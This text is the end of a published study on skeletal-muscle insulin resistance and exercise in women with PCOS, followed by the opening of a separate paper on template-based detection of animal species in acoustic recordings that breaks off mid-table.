insulin resistance in skeletal muscle in PCOS and its attenuated response to therapy. We now propose that the TGFβ ligand signalling via SMAD-mTOR/SMAD-Akt pathways plus tissue fibrosis is mechanistically involved in PCOS-specific insulin resistance, its synergy with obesity (Fig. 6) and possible resistance to therapy. Our study limitations included a small sample size (9, 28, 29) due to the invasive procedures used to obtain tissue samples. As this was an ancillary analysis tissue availability was limited (additional analysis via immunoblotting of TGFβ signalling) and not collected to for immunohistochemistry. We acknowledge that the sample size was limited for the exercise arm of the study, which may have limited power to detect exercise- induced alterations in fibrosis in the OWC group. Alternatively, we could also speculate that perhaps on OWC exercise does not re-model the ECM unlike the OWP. However, the strengths of this work were the use of gold-standard methods to assess insulin sensitivity in a community-recruited, well-characterised population of lean and overweight women with or without PCOS. We cannot rule out contributions of differential body composition and other systemic factors (Supplementary Tables 3 and 4) to insulin resistance in women with PCOS. Specifically, FAI index correlated strongly (negatively) with end clamp GIR in women with PCOS but not controls, but were no longer significant when LP and OWP were considered separately (r2 ~ −0.40, P > 0.05). Additionally, exercise-induced reduction in FAI correlated strongly with the increases in GIR for the sub-group of PCOS women. These data suggest a role of hyperandrogenism in PCOS-specific IR. However, FAI did not correlate with any insulin signalling or TGFβ and tissue fibrosis gene expression data in this study. FAI is a calculated variable dependant on SHBG concentrations, which are impacted by insulin resistance (50). Taken together with most literature (10, 13) this study could not establish the role of hyperandrogenism in causing insulin resistance in PCOS via peripheral tissue insulin signalling and fibrosis. Conclusions Our data provide new insights into PCOS-specific insulin resistance and the associated early signalling events in skeletal muscle highlighting a role for aberrant mTOR signalling. These data also support our hypothesis that TGFβ superfamily ligands, their signalling and tissue fibrosis are involved in PCOS-specific insulin resistance, Figure 6 Hypothetical signalling pathway showing that dysfunctional TGFβ network signalling regulates tissue fibrosis and may play a role in this PCOS-specific insulin resistance and its limited response to exercise training. This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-19-0551 https://ec.bioscientifica.com © 2020 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:11PM via free access https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-19-0551 https://ec.bioscientifica.com N K Stepto, D Hiam et al. Insulin resistance in PCOS skeletal muscle 357 PB–XX 9:4 particularly driving the synergy between obesity and PCOS. Intensified aerobic exercise training did not restore insulin sensitivity, despite improving insulin stimulated signalling at Akt, AS160 and mTOR in overweight women with PCOS. There was no clear evidence to support a role for hyperandrogenism in peripheral tissue insulin resistance, in women with PCOS. Overall, additional human research (in vivo and in vitro), supported by appropriate animals studies, is warranted to elucidate the role of androgens, mTOR signalling, TGFβ ligand signalling networks and ECM deposition in PCOS-specific insulin resistance. Supplementary materials Supplementary data has been deposited in a public data share repository and is available at: https://figshare.com/articles/Supplementary_Material_ Molecular_Mechanisms_of_Insulin_Resistance_in_Skeletal_Muscle_of_ Women_with_PCOS/6726761. Declaration of interest N S, B S, B C and H T were awarded the NHMRC grant APP606553 (2010–2011), N S and R R were awarded an NHMRC grant APP1156329 (2019–2022), D H an Australia Postgraduate Scholarship. M G H and H T are NHMRC Research Fellows (APP1110701 and APP1042516). The other authors have nothing to disclose. Funding The study was funded by the National Health and Medical Research Council of Australia (NHMRC) project grant scheme grants APP606553 and APP1156329. Author contribution statement N S and H T made substantial contributions to conception and design, acquisition of data, analysis and interpretation of data; drafting the article or revising it critically for important intellectual content; final approval of the version to be published. A J, A M A, B S, B C, C H, D H, M G H, N H, R R and S C made substantial contributions to acquisition of data, analysis and interpretation of data; drafting the article or revising it critically for important intellectual content; final approval of the version to be published. Acknowledgements The authors wish to acknowledge the passing of their esteemed colleague and friend Prof Nigel Stepto, 4 February 2020. The authors would like to thank Profs James D Cameron and Juleen R Zierath for their critical insights into study design and funding, Prof Will Hopkins for MBI statistics and SAS coding and Dr Rebecca Goldstein for assistance during the trials. Data sharing is available with de-identified raw data, statistical programs and analysis plans all available from authors on request. References 1 Bozdag G, Mumusoglu S, Zengin D, Karabulut E & Yildiz BO. The prevalence and phenotypic features of polycystic ovary syndrome: a systematic review and meta-analysis. Human Reproduction 2016 31 2841–2855. (https://doi.org/10.1093/humrep/dew218) 2 Moran LJ, Lombard CB, Lim S, Noakes M & Teede HJ. Polycystic ovary syndrome and weight management. Women’s Health 2010 6 271–283. (https://doi.org/10.2217/whe.09.89) 3 Kakoly NS, Khomami MB, Joham AE, Cooray SD, Misso ML, Norman RJ, Harrison CL, Ranasinha S, Teede HJ & Moran LJ. Ethnicity, obesity and the prevalence of impaired glucose tolerance and type 2 diabetes in PCOS: a systematic review and meta- regression. Human Reproduction Update 2018 24 455–467. (https://doi. org/10.1093/humupd/dmy007) 4 Lim SS, Kakoly NS, Tan JWJ, Fitzgerald G, Khomami MB, Joham AE, Cooray SD, Misso ML, Norman RJ, Harrison CL, et al. Metabolic syndrome in polycystic ovary syndrome: a systematic review, meta- analysis and meta-regression. Obesity Reviews 2019 20 339–352. (https://doi.org/10.1111/obr.12762) 5 Teede HJ, Misso ML, Deeks AA, Moran LJ, Stuckey BGA, Wong JLA, Norman RJ, Costello MF & Guideline Development Groups. Assessment and management of polycystic ovary syndrome: summary of an evidence-based guideline. Medical Journal of Australia 2011 195 S65–S112. (https://doi.org/10.5694/mja11.10915) 6 Teede HJ, Misso ML, Costello MF, Dokras A, Laven J, Moran L, Piltonen T, Norman RJ & International PCOS Network. Recommendations from the international evidence-based guideline for the assessment and management of polycystic ovary syndrome. Clinical Endocrinology 2018 89 251–268. (https://doi.org/10.1111/cen.13795) 7 Cooney LG, Lee I, Sammel MD & Dokras A. High prevalence of moderate and severe depressive and anxiety symptoms in polycystic ovary syndrome: a systematic review and meta-analysis. Human Reproduction 2017 32 1075–1091. (https://doi.org/10.1093/humrep/ dex044) 8 Stepto NK, Moreno-Asso A, McIlvenna LC, Walters KA & Rodgers RJ. Molecular mechanisms of insulin resistance in polycystic ovary syndrome. Unraveling the conundrum in skeletal muscle? Journal of Clinical Endocrinology and Metabolism 2019 104 5372–5381. (https:// doi.org/10.1210/jc.2019-00167) 9 Stepto NK, Cassar S, Joham AE, Hutchison SK, Harrison CL, Goldstein RF & Teede HJ. Women with polycystic ovary syndrome have intrinsic insulin resistance on euglycaemic-hyperinsulaemic clamp. Human Reproduction 2013 28 777–784. (https://doi. org/10.1093/humrep/des463) 10 Cassar S, Misso ML, Hopkins WG, Shaw CS, Teede HJ & Stepto NK. Insulin resistance in polycystic ovary syndrome: a systematic review and meta-analysis of euglycaemic-hyperinsulinaemic clamp studies. Human Reproduction 2016 31 2619–2631. (https://doi.org/10.1093/ humrep/dew243) 11 Moran LJ, Misso ML, Wild RA & Norman RJ. Impaired glucose tolerance, type 2 diabetes and metabolic syndrome in polycystic ovary syndrome: a systematic review and meta-analysis. Human Reproduction Update 2010 16 347–363. (https://doi.org/10.1093/ humupd/dmq001) 12 Rodgers RJ, Avery JC, Moore VM, Davies MJ, Azziz R, Stener- Victorin E, Moran LJ, Robertson SA, Stepto NK, Norman RJ, et al. Complex diseases and co-morbidities: polycystic ovary syndrome and type 2 diabetes mellitus. Endocrine Connections 2019 8 R71–R75. (https://doi.org/10.1530/EC-18-0502) 13 Diamanti-Kandarakis E & Dunaif A. Insulin resistance and the polycystic ovary syndrome revisited: an update on mechanisms and implications. Endocrine Reviews 2012 33 981–1030. (https://doi. org/10.1210/er.2011-1034) 14 Legro RS, Arslanian SA, Ehrmann DA, Hoeger KM, Murad MH, Pasquali R, Welt CK & Endocrine Society. Diagnosis and treatment of polycystic ovary syndrome: an Endocrine Society clinical practice guideline. Journal of Clinical Endocrinology and Metabolism 2013 98 4565–4592. (https://doi.org/10.1210/jc.2013-2350) 15 Stepto NK, Patten R, Tassone EC, Misso ML, Brennan L, Boyle J, Boyle RA, Harrison CL, Hirschberg AL, Marsh K, et al. Exercise recommendations for women with polycystic ovary syndrome: is the This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-19-0551 https://ec.bioscientifica.com © 2020 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:11PM via free access https://figshare.com/articles/Supplementary_Material_Molecular_Mechanisms_of_Insulin_Resistance_in_Skeletal_Muscle_of_Women_with_PCOS/6726761 https://figshare.com/articles/Supplementary_Material_Molecular_Mechanisms_of_Insulin_Resistance_in_Skeletal_Muscle_of_Women_with_PCOS/6726761 https://figshare.com/articles/Supplementary_Material_Molecular_Mechanisms_of_Insulin_Resistance_in_Skeletal_Muscle_of_Women_with_PCOS/6726761 https://doi.org/10.1093/humrep/dew218 https://doi.org/10.2217/whe.09.89 https://doi.org/10.1093/humupd/dmy007 https://doi.org/10.1093/humupd/dmy007 https://doi.org/10.1111/obr.12762 https://doi.org/10.5694/mja11.10915 https://doi.org/10.1111/cen.13795 https://doi.org/10.1093/humrep/dex044 https://doi.org/10.1093/humrep/dex044 https://doi.org/10.1210/jc.2019-00167 https://doi.org/10.1210/jc.2019-00167 https://doi.org/10.1093/humrep/des463 https://doi.org/10.1093/humrep/des463 https://doi.org/10.1093/humrep/dew243 https://doi.org/10.1093/humrep/dew243 https://doi.org/10.1093/humupd/dmq001 https://doi.org/10.1093/humupd/dmq001 https://doi.org/10.1530/EC-18-0502 https://doi.org/10.1210/er.2011-1034 https://doi.org/10.1210/er.2011-1034 https://doi.org/10.1210/jc.2013-2350 https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-19-0551 https://ec.bioscientifica.com N K Stepto, D Hiam et al. Insulin resistance in PCOS skeletal muscle 3589:4 evidence enough? Sports Medicine 2019 49 1143–1157. (https://doi. org/10.1007/s40279-019-01133-6) 16 Lundsgaard AM & Kiens B. Gender differences in skeletal muscle substrate metabolism – molecular mechanisms and insulin sensitivity. Frontiers in Endocrinology 2014 5 195. (https://doi. org/10.3389/fendo.2014.00195) 17 Krook A, Bjornholm M, Galuska D, Jiang XJ, Fahlman R, Myers Jr MG, Wallberg-Henriksson H & Zierath JR. Characterization of signal transduction and glucose transport in skeletal muscle from type 2 diabetic patients. Diabetes 2000 49 284–292. (https://doi. org/10.2337/diabetes.49.2.284) 18 Krook A, Roth RA, Jiang XJ, Zierath JR & Wallberg-Henriksson H. Insulin-stimulated Akt kinase activity is reduced in skeletal muscle from NIDDM subjects. Diabetes 1998 47 1281–1286. (https://doi. org/10.2337/diab.47.8.1281) 19 Consitt LA, Van Meter J, Newton CA, Collier DN, Dar MS, Wojtaszewski JFP, Treebak JT, Tanner CJ & Houmard JA. Impairments in site-specific AS160 phosphorylation and effects of exercise training. Diabetes 2013 62 3437–3447. (https://doi.org/10.2337/db13-0229) 20 Hojlund K, Glintborg D, Andersen NR, Birk JB, Treebak JT, Frosig C, Beck-Nielsen H & Wojtaszewski JF. Impaired insulin-stimulated phosphorylation of Akt and AS160 in skeletal muscle of women with polycystic ovary syndrome is reversed by pioglitazone treatment. Diabetes 2008 57 357–366. (https://doi.org/10.2337/db07-0706) 21 Hansen SL, Svendsen PF, Jeppesen JF, Hoeg LD, Andersen NR, Kristensen JM, Nilas L, Lundsgaard AM, Wojtaszewski JFP, Madsbad S, et al. Molecular mechanisms in skeletal muscle underlying insulin resistance in lean women with polycystic ovary syndrome. Journal of Clinical Endocrinology and Metabolism 2018 104 1841–1854. (https:// doi.org/10.1210/jc.2018-01771) 22 Raja-Khan N, Urbanek M, Rodgers RJ & Legro RS. The role of TGF- beta in polycystic ovary syndrome. Reproductive Sciences 2014 21 20–31. (https://doi.org/10.1177/1933719113485294) 23 Böhm A, Hoffmann C, Irmler M, Schneeweiss P, Schnauder G, Sailer C, Schmid V, Hudemann J, Machann J, Schick F, et al. TGF- β contributes to impaired exercise response by suppression of mitochondrial key regulators in skeletal muscle. Diabetes 2016 65 2849–2861. (https://doi.org/10.2337/db15-1723) 24 Seong HA, Manoharan R & Ha H. Smad proteins differentially regulate obesity-induced glucose and lipid abnormalities and inflammation via class-specific control of AMPK-related kinase MPK38/MELK activity. Cell Death and Disease 2018 9 471. (https:// doi.org/10.1038/s41419-018-0489-x) 25 Takahashi H, Alves CRR, Stanford KI, Middelbeek RJW, Nigro P, Ryan RE, Xue R, Sakaguchi M, Lynes MD, So K, et al. TGF-β2 is an exercise-induced adipokine that regulates glucose and fatty acid metabolism. Nature Metabolism 2019 1 291–303. (https://doi. org/10.1038/s42255-018-0030-7) 26 Richter EA & Hargreaves M. Exercise, GLUT4, and skeletal muscle glucose uptake. Physiological Reviews 2013 93 993–1017. (https://doi. org/10.1152/physrev.00038.2012) 27 Harrison CL, Lombard CB, Strauss BJ & Teede HJ. Optimizing healthy gestational weight gain in women at high risk of gestational diabetes: a randomized controlled trial. Obesity 2013 21 904–909. (https://doi. org/10.1002/oby.20163) 28 Hutchison SK, Stepto NK, Harrison CL, Moran LJ, Strauss BJ & Teede HJ. Effects of exercise on insulin resistance and body composition in overweight and obese women with and without polycystic ovary syndrome. Journal of Clinical Endocrinology and Metabolism 2011 96 E48–E56. (https://doi.org/10.1210/jc.2010-0828) 29 Hutchison SK, Teede HJ, Rachon D, Harrison CL, Strauss BJ & Stepto NK. Effect of exercise training on insulin sensitivity, mitochondria and computed tomography muscle attenuation in overweight women with and without polycystic ovary syndrome. Diabetologia 2012 55 1424–1434. (https://doi.org/10.1007/s00125- 011-2442-8) 30 Harrison CL, Stepto NK, Hutchison SK & Teede HJ. The impact of intensified exercise training on insulin resistance and fitness in overweight and obese women with and without polycystic ovary syndrome. Clinical Endocrinology 2012 76 351–357. (https://doi. org/10.1111/j.1365-2265.2011.04160.x) 31 Meyer C, McGrath BP & Teede HJ. Overweight women with polycystic ovary syndrome have evidence of subclinical cardiovascular disease. Journal of Clinical Endocrinology and Metabolism 2005 90 5711–5716. (https://doi.org/10.1210/jc.2005-0011) 32 Benziane B, Burton TJ, Scanlan B, Galuska D, Canny BJ, Chibalin AV, Zierath JR & Stepto NK. Divergent cell signaling after short-term intensified endurance training in human skeletal muscle. American Journal of Physiology: Endocrinology and Metabolism 2008 295 E1427–E1438. (https://doi.org/10.1152/ajpendo.90428.2008) 33 Parker L, Stepto NK, Shaw CS, Serpiello FR, Anderson M, Hare DL & Levinger I. Acute high-intensity interval exercise-induced redox signaling is associated with enhanced insulin sensitivity in obese middle-aged men. Frontiers in Physiology 2016 7 411. (https://doi. org/10.3389/fphys.2016.00411) 34 Parker L, Trewin A, Levinger I, Shaw CS & Stepto NK. The effect of exercise-intensity on skeletal muscle stress kinase and insulin protein signaling. PLoS ONE 2017 12 e0171613. (https://doi.org/10.1371/ journal.pone.0171613) 35 Prodoehl MJ, Hatzirodos N, Irving-Rodgers HF, Zhao ZZ, Painter JN, Hickey TE, Gibson MA, Rainey WE, Carr BR, Mason HD, et al. Genetic and gene expression analyses of the polycystic ovary syndrome candidate gene fibrillin-3 and other fibrillin family members in human ovaries. Molecular Human Reproduction 2009 15 829–841. (https://doi.org/10.1093/molehr/gap072) 36 Hopkins WG, Marshall SW, Batterham AM & Hanin J. Progressive statistics for studies in sports medicine and exercise science. Medicine and Science in Sports and Exercise 2009 41 3–13. (https://doi. org/10.1249/MSS.0b013e31818cb278) 37 Corbould A, Kim YB, Youngren JF, Pender C, Kahn BB, Lee A & Dunaif A. Insulin resistance in the skeletal muscle of women with polycystic ovary syndrome involves both intrinsic and acquired defects in insulin signaling. American Journal of Physiology: Endocrinology and Metabolism 2005 288 E1047–E1054. (https://doi. org/10.1152/ajpendo.00361.2004) 38 Parker L, Shaw CS, Stepto NK & Levinger I. Exercise and glycemic control: focus on redox homeostasis and redox-sensitive protein signaling. Frontiers in Endocrinology 2017 8 87. (https://doi. org/10.3389/fendo.2017.00087) 39 Kleinert M, Sylow L, Fazakerley DJ, Krycer JR, Thomas KC, Oxboll AJ, Jordy AB, Jensen TE, Yang G, Schjerling P, et al. Acute mTOR inhibition induces insulin resistance and alters substrate utilization in vivo. Molecular Metabolism 2014 3 630–641. (https://doi. org/10.1016/j.molmet.2014.06.004) 40 Bodine SC, Stitt TN, Gonzalez M, Kline WO, Stover GL, Bauerlein R, Zlotchenko E, Scrimgeour A, Lawrence JC, Glass DJ, et al. Akt/mTOR pathway is a crucial regulator of skeletal muscle hypertrophy and can prevent muscle atrophy in vivo. Nature Cell Biology 2001 3 1014–1019. (https://doi.org/10.1038/ncb1101-1014) 41 Dantas WS, Marcondes JA, Shinjo SK, Perandini LA, Zambelli VO, Neves WD, Barcellos CR, Rocha MP, Yance V dos R, Pereira RT, et al. GLUT4 translocation is not impaired after acute exercise in skeletal muscle of women with obesity and polycystic ovary syndrome. Obesity 2015 23 2207–2215. (https://doi.org/10.1002/oby.21217) 42 Peck GR, Chavez JA, Roach WG, Budnik BA, Lane WS, Karlsson HK, Zierath JR & Lienhard GE. Insulin-stimulated phosphorylation of the Rab GTPase-activating protein TBC1D1 regulates GLUT4 translocation. Journal of Biological Chemistry 2009 284 30016–30023. (https://doi.org/10.1074/jbc.M109.035568) 43 Tonks KT, Ng Y, Miller S, Coster AC, Samocha-Bonet D, Iseli TJ, Xu A, Patrick E, Yang JY, Junutula JR, et al. Impaired Akt phosphorylation in insulin-resistant human muscle is accompanied by selective and This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-19-0551 https://ec.bioscientifica.com © 2020 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:11PM via free access https://doi.org/10.1007/s40279-019-01133-6 https://doi.org/10.1007/s40279-019-01133-6 https://doi.org/10.3389/fendo.2014.00195 https://doi.org/10.3389/fendo.2014.00195 https://doi.org/10.2337/diabetes.49.2.284 https://doi.org/10.2337/diabetes.49.2.284 https://doi.org/10.2337/diab.47.8.1281 https://doi.org/10.2337/diab.47.8.1281 https://doi.org/10.2337/db13-0229 https://doi.org/10.2337/db07-0706 https://doi.org/10.1210/jc.2018-01771 https://doi.org/10.1210/jc.2018-01771 https://doi.org/10.1177/1933719113485294 https://doi.org/10.2337/db15-1723 https://doi.org/10.1038/s41419-018-0489-x https://doi.org/10.1038/s41419-018-0489-x https://doi.org/10.1038/s42255-018-0030-7 https://doi.org/10.1038/s42255-018-0030-7 https://doi.org/10.1152/physrev.00038.2012 https://doi.org/10.1152/physrev.00038.2012 https://doi.org/10.1002/oby.20163 https://doi.org/10.1002/oby.20163 https://doi.org/10.1210/jc.2010-0828 https://doi.org/10.1007/s00125-011-2442-8 https://doi.org/10.1007/s00125-011-2442-8 https://doi.org/10.1111/j.1365-2265.2011.04160.x https://doi.org/10.1111/j.1365-2265.2011.04160.x https://doi.org/10.1210/jc.2005-0011 https://doi.org/10.1152/ajpendo.90428.2008 https://doi.org/10.3389/fphys.2016.00411 https://doi.org/10.3389/fphys.2016.00411 https://doi.org/10.1371/journal.pone.0171613 https://doi.org/10.1371/journal.pone.0171613 https://doi.org/10.1093/molehr/gap072 https://doi.org/10.1249/MSS.0b013e31818cb278 https://doi.org/10.1249/MSS.0b013e31818cb278 https://doi.org/10.1152/ajpendo.00361.2004 https://doi.org/10.1152/ajpendo.00361.2004 https://doi.org/10.3389/fendo.2017.00087 https://doi.org/10.3389/fendo.2017.00087 https://doi.org/10.1016/j.molmet.2014.06.004 https://doi.org/10.1016/j.molmet.2014.06.004 https://doi.org/10.1038/ncb1101-1014 https://doi.org/10.1002/oby.21217 https://doi.org/10.1074/jbc.M109.035568 https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-19-0551 https://ec.bioscientifica.com N K Stepto, D Hiam et al. Insulin resistance in PCOS skeletal muscle 359 PB–XX 9:4 heterogeneous downstream defects. Diabetologia 2013 56 875–885. (https://doi.org/10.1007/s00125-012-2811-y) 44 Newton AC. Regulation of the ABC kinases by phosphorylation: protein kinase C as a paradigm. Biochemical Journal 2003 370 361–371. (https://doi.org/10.1042/BJ20021626) 45 Yu C, Chen Y, Cline GW, Zhang D, Zong H, Wang Y, Bergeron R, Kim JK, Cushman SW, Cooney GJ, et al. Mechanism by which fatty acids inhibit insulin activation of insulin receptor substrate-1 (IRS-1)-associated phosphatidylinositol 3-kinase activity in muscle. Journal of Biological Chemistry 2002 277 50230–50236. (https://doi. org/10.1074/jbc.M200958200) 46 Goto-Inoue N, Yamada K, Inagaki A, Furuichi Y, Ogino S, Manabe Y, Setou M & Fujii NL. Lipidomics analysis revealed the phospholipid compositional changes in muscle by chronic exercise and high-fat diet. Scientific Reports 2013 3 3267. (https://doi.org/10.1038/srep03267) 47 Cassar S, Teede HJ, Moran LJ, Joham AE, Harrison CL, Strauss BJ & Stepto NK. Polycystic ovary syndrome and anti-Mullerian hormone: role of insulin resistance, androgens, obesity and gonadotrophins. Clinical Endocrinology 2014 81 899–906. (https://doi.org/10.1111/ cen.12557) 48 Tal R, Seifer DB, Shohat-Tal A, Grazi RV & Malter HE. Transforming growth factor-beta1 and its receptor soluble endoglin are altered in polycystic ovary syndrome during controlled ovarian stimulation. Fertility and Sterility 2013 100 538–543. (https://doi.org/10.1016/j. fertnstert.2013.04.022) 49 Chen JL, Colgan TD, Walton KL, Gregorevic P & Harrison CA. The TGF-β signalling network in muscle development, adaptation and disease. In Growth Factors and Cytokines in Skeletal Muscle Development, Growth, Regeneration and Disease, pp. 97–131. Eds J White & G Smythe. Cham, Switzerland: Springer International Publishing, 2016. (https://doi.org/10.1007/978-3-319-27511-6_5) 50 Cassar S, Teede HJ, Harrison CL, Joham AE, Moran LJ & Stepto NK. Biomarkers and insulin sensitivity in women with polycystic ovary syndrome: characteristics and predictive capacity. Clinical Endocrinology 2015 83 50–58. (https://doi.org/10.1111/ cen.12619) Received in final form 27 February 2020 Accepted 31 March 2020 Accepted Manuscript published online 31 March 2020 This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-19-0551 https://ec.bioscientifica.com © 2020 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:11PM via free access https://doi.org/10.1007/s00125-012-2811-y https://doi.org/10.1042/BJ20021626 https://doi.org/10.1074/jbc.M200958200 https://doi.org/10.1074/jbc.M200958200 https://doi.org/10.1038/srep03267 https://doi.org/10.1111/cen.12557 https://doi.org/10.1111/cen.12557 https://doi.org/10.1016/j.fertnstert.2013.04.022 https://doi.org/10.1016/j.fertnstert.2013.04.022 https://doi.org/10.1007/978-3-319-27511-6_5 https://doi.org/10.1111/cen.12619 https://doi.org/10.1111/cen.12619 https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-19-0551 https://ec.bioscientifica.com Abstract Introduction Materials and methods Participants Study design Exercise intervention Clinical and biochemical measurements Muscle protein extraction and Western blot analyses RNA extraction and TGFβ network/tissue fibrosis gene expression analysis Statistical analysis Results Insulin signalling Gene expression for tissue fibrosis Impact of exercise Discussion Conclusions Supplementary materials Declaration of interest Funding Author contribution statement Acknowledgements References work_dsbccp6hrncrfph5eqx5uhjmjm ---- Submitted 21 December 2016 Accepted 5 April 2017 Published 24 April 2017 Corresponding author Carlos J. Corrada Bravo, carlos.corrada2@upr.edu Academic editor Elena Marchiori Additional Information and Declarations can be found on page 21 DOI 10.7717/peerj-cs.113 Copyright 2017 Corrada Bravo et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Species-specific audio detection: a comparison of three template-based detection algorithms using random forests Carlos J. Corrada Bravo1,2, Rafael Álvarez Berríos2 and T. Mitchell Aide2,3 1 Department of Computer Science, University of Puerto Rico—Rio Piedras, San Juan, Puerto Rico 2 Sieve Analytics, Inc., San Juan, Puerto Rico 3 Department of Biology, University of Puerto Rico—Río Piedras, San Juan, Puerto Rico ABSTRACT We developed a web-based cloud-hosted system that allow users to archive, listen, visualize, and annotate recordings. The system also provides tools to convert these annotations into datasets that can be used to train a computer to detect the presence or absence of a species. The algorithm used by the system was selected after comparing the accuracy and efficiency of three variants of a template-based detection. The algorithm computes a similarity vector by comparing a template of a species call with time increments across the spectrogram. Statistical features are extracted from this vector and used as input for a Random Forest classifier that predicts presence or absence of the species in the recording. The fastest algorithm variant had the highest average accuracy and specificity; therefore, it was implemented in the ARBIMON web-based system. Subjects Bioinformatics, Computational Biology, Data Mining and Machine Learning Keywords Acoustic monitoring, Machine learning, Animal vocalizations, Recording visualization, Recording annotation, Generic species algorithm, Web-based cloud-hosted system, Random Forest classifier, Species prediction, Species-specific audio detection INTRODUCTION Monitoring fauna is an important task for ecologists, natural resource managers, and conservationists. Historically, most data were collected manually by scientists that went to the field and annotated their observations (Terborgh et al., 1990). This generally limited the spatial and temporal extend of the data. Furthermore, given that the data were based on an individual’s observations, the information was difficult to verify, reducing its utility for understanding long-term ecological processes (Acevedo & Villanueva-Rivera, 2006). To understand the impacts of climate change and deforestation on the fauna, the scientific community needs long-term, wide-spread and frequent data (Walther et al., 2002). Passive acoustic monitoring (PAM) can contribute to this need because it facilitates the collection of large amounts of data from many sites simultaneously, and with virtually no impact to the fauna and environment (Brandes, 2008; Lammers et al., 2008; Tricas & Boyle, 2009; Celis-Murillo, Deppe & Ward, 2012). In general, PAM systems include a microphone or a hydrophone connected to a self powered system and enough memory to store various weeks or months of recordings, but there are also permanent systems that How to cite this article Corrada Bravo et al. (2017), Species-specific audio detection: a comparison of three template-based detection al- gorithms using random forests. PeerJ Comput. Sci. 3:e113; DOI 10.7717/peerj-cs.113 https://peerj.com mailto:carlos.corrada2@upr.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.113 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.113 use solar panels and an Internet connection to upload recordings in real time to a cloud based analytical platform (Aide et al., 2013). Passive recorders can easily create a very large data set (e.g., 100,000s of recordings) that is overwhelming to manage and analyze. Although researchers often collect recordings twenty-four hours a day for weeks or months (Acevedo & Villanueva-Rivera, 2006; Brandes, 2008; Lammers et al., 2008; Sueur et al., 2008; Marques et al., 2013; Blumstein et al., 2011), in practice, most studies have only analyzed a small percentage of the total number of recordings. Web-based applications have been developed to facilitate data management of these increasingly large datasets (Aide et al., 2013; Villanueva-Rivera & Pijanowski, 2012), but the biggest challenge is to develop efficient and accurate algorithms for detecting the presence or absence of a species in many recordings. Algorithms for species identification have been developed using spectrogram matched filtering (Clark, Marler & Beeman, 1987; Chabot, 1988), statistical feature extraction (Taylor, 1995; Grigg et al., 1996), k-Nearest neighbor algorithm (Han, Muniandy & Dayou, 2011; Gunasekaran & Revathy, 2010), Support Vector Machine (Fagerlund, 2007; Acevedo et al., 2009), tree- based classifiers (Adams, Law & Gibson, 2010; Henderson, Hildebrand & Smith 2011) and template based detection (Anderson, Dave & Margoliash, 1996; Mellinger & Clark, 2000), but most of these algorithms are built for a specific species and there was no infrastructure provided for the user to create models for other species. In this study, we developed a method that detects the presence or absence of a species’ specific call type in recordings with a response time that allows researchers to create, run, tune and re-run models in real time as well as detect hundreds of thousands of recordings in a reasonable time. The main objective of the study was to compare the performance (e.g., efficiency and accuracy) of three variants of a template-based detection algorithm and incorporate the best into the ARBIMON II bioacoustics platform. The first variant is the Structural Similarity Index described in Wang et al. (2004), a widely use method to find how similar two images are (in our case the template with the tested recording). The second method filters the recordings with the dynamic thresholding method described in Van der Walt et al. (2014) and then use the Frobenius norm to find similarities with the template. The final method uses the Structural Similarity Index, but it is only applied to regions with high match probability determined by the OpenCV’s matchTemplate procedure (Bradski, 2000). MATERIALS AND METHODS Passive acoustic data acquisition We gathered recordings from five locations: four in Puerto Rico and one in Peru. Some of the recordings were acquired using the Automated Remote Biodiversity Monitoring Network (ARBIMON) data acquisition system described in Aide et al. (2013), while others were acquired using the newest version of ARBIMON permanent recording station, which uses an Android cell phone and transmits the recorded data through a cellular network. All recordings have a sampling rate of 44.1 kHz, a sampling depth of 16-bit and an approximate duration of 60 s (±.5 s) Corrada Bravo et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.113 2/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.113 Figure 1 Recording locations in Puerto Rico. Map data: Google, Image—Landsat/Copernicus and Data—SIO, NOAA, US Navy, NGA and GEBCO. Figure 2 Recording location in Peru. Map data: Google, US Dept. of State Geographer, Image— Landsat/Copernicus and Data—SIO, NOAA, US Navy, NGA and GEBCO. The locations in Puerto Rico were the Sabana Seca permanent station in Toa Baja, the Casa la Selva station in Carite Mountains (Patillas), El Yunque National Forest in Rio Grande and Mona Island (see Fig. 1). The location in Peru was the Amarakaeri Communal Reserve in the Madre de Dios Region (see Fig. 2). In all the locations, the recorders were programmed to record one minute of audio every 10 min. The complete dataset has more than 100,000 1-minute recordings. We randomly chose 362 recordings from Puerto Rico and 547 recordings from Peru for comparing the three algorithm variants. We used the ARBIMON II web application interface to annotate the presence or absence of 21 species in all the recordings. Regions in the recording where a species emits a sound were also marked using the web interface. Each region of interest (ROI) is a rectangle Corrada Bravo et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.113 3/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.113 Table 1 Species, class, location and count of recordings with validated data. Species Group Total Presence Absence Location Eleutherodactylus cooki Amphibian 38 19 19 Carite Eleutherodactylus brittoni Amphibian 38 17 21 Sabana Seca Eleutherodactylus cochranae Amphibian 54 30 24 Sabana Seca Eleutherodactylus coqui Amphibian 53 41 12 Sabana Seca Eleutherodactylus juanariveroi Amphibian 35 14 21 Sabana Seca Unknown Insect Insect 48 22 26 Sabana Seca Epinephelus guttatus 